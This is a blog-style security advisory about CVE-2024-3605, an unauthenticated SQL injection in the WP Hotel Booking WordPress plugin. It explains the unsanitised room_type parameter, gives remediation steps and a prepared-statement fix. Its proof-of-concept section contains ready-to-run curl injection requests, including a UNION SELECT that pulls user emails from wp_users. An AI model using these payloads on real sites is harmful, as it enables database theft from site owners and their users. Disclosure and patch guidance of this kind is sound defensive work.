CVE CyberSecurity Database News

CVE-2024-3605 - Critical SQL Injection in WP Hotel Booking WordPress Plugin

Poster -

*Published: June 2024 | By: WP Security Insights*


WP Hotel Booking is a popular WordPress plugin that helps hotel owners manage booking systems directly from their websites. But recently, a serious vulnerability was discovered: CVE-2024-3605. This flaw allows unauthenticated attackers to perform SQL Injection attacks, potentially exposing sensitive data of your website.

In this article, we’ll break down what CVE-2024-3605 means, how the exploit works, show example payloads, and provide links for further reading.

Vulnerable Versions: Up to and including 2.1.

- Attack Vector: Unauthenticated, via REST API /wphb/v1/rooms/search-rooms
- Danger: Database compromise — user data theft, credential leaks, possible further site takeover

What’s CVE-2024-3605 About?

The WP Hotel Booking plugin provides REST API endpoints for front-end and back-end interactions. One endpoint is:

/wphb/v1/rooms/search-rooms

This endpoint takes user input, including the room_type parameter. The issue: it does not properly escape or validate what’s submitted. That means an attacker can craft their own SQL as input — and the plugin will stick it right into a SQL query.

No authentication required! Anyone — even unregistered users — can send these requests.

Technical Details: How the Attack Works

When a request is made to /wphb/v1/rooms/search-rooms, the room_type parameter is picked up and inserted into a SQL query like this (example pseudocode):

$room_type = $_REQUEST['room_type']; // NO PROPER VALIDATION!
$sql = "SELECT * FROM wp_rooms WHERE room_type = '$room_type'";
$result = $wpdb->get_results($sql);

If an attacker sends normal data — say, room_type=single — it works as intended.

But they can send something malicious, such as

room_type=single' OR 1=1 --

Translated, the SQL executed by the server is

SELECT * FROM wp_rooms WHERE room_type = 'single' OR 1=1 --'

Here, OR 1=1 always evaluates to true, so all rooms are returned, regardless of their actual room_type.

Example Exploit (Proof of Concept)

Let’s say the website is at https://victim.com.

Request Payload (with SQL Injection)

curl -X POST "https://victim.com/wp-json/wphb/v1/rooms/search-rooms" \
  -H 'Content-Type: application/json' \
  -d '{"room_type": "single\' OR 1=1-- -"}'

To try and fetch user emails (if the SQL statement is concatenated improperly)

curl -X POST "https://victim.com/wp-json/wphb/v1/rooms/search-rooms" \
  -H 'Content-Type: application/json' \
  -d '{"room_type": "single\' UNION SELECT user_email,2,3,4 FROM wp_users-- -"}'

Depending on how the SQL is crafted, this could return user emails, usernames, password hashes, etc.

How Was This Found?

The vulnerability was responsibly disclosed by security researchers and added to the public CVE database. See these official references for technical reports:

- WPScan Advisory
- NVD Entry – CVE-2024-3605
- WP Hotel Booking Plugin Download Page

Who Should Worry?

Any WordPress site using WP Hotel Booking version 2.1. or below is at risk. That means thousands of live websites could be vulnerable, especially if automatic plugin updates are disabled.

1. Upgrade Immediately

- Update WP Hotel Booking to the latest safe version from the official WordPress plugin repository.

2. Block Offending API Endpoints

- Use security plugins to block all access to /wphb/v1/rooms/search-rooms for unauthenticated users.

4. Follow Secure Development Practices

- Always escape user inputs and use prepared SQL statements, especially when handling REST API parameters.

Here’s a secure way to handle SQL input in WordPress

$room_type = $_REQUEST['room_type'];
$sql = $wpdb->prepare("SELECT * FROM wp_rooms WHERE room_type = %s", $room_type);
$result = $wpdb->get_results($sql);

The $wpdb->prepare() function properly escapes parameters, blocking SQL injection.

Final Thoughts

CVE-2024-3605 is a textbook case for why input validation and query preparation matters. If you run a hotel or manage client sites using WP Hotel Booking, act now. Never trust user input – and always keep your plugins updated.

- Official Plugin Page
- WPScan Vulnerability Entry
- National Vulnerability Database: CVE-2024-3605
- WordPress Security Whitepaper


Stay safe out there! If you like this post, follow [WP Security Insights](#) for more real-world WordPress security news and advice.

Timeline

Published on: 06/20/2024 02:15:10 UTC
Last modified on: 07/15/2024 17:12:36 UTC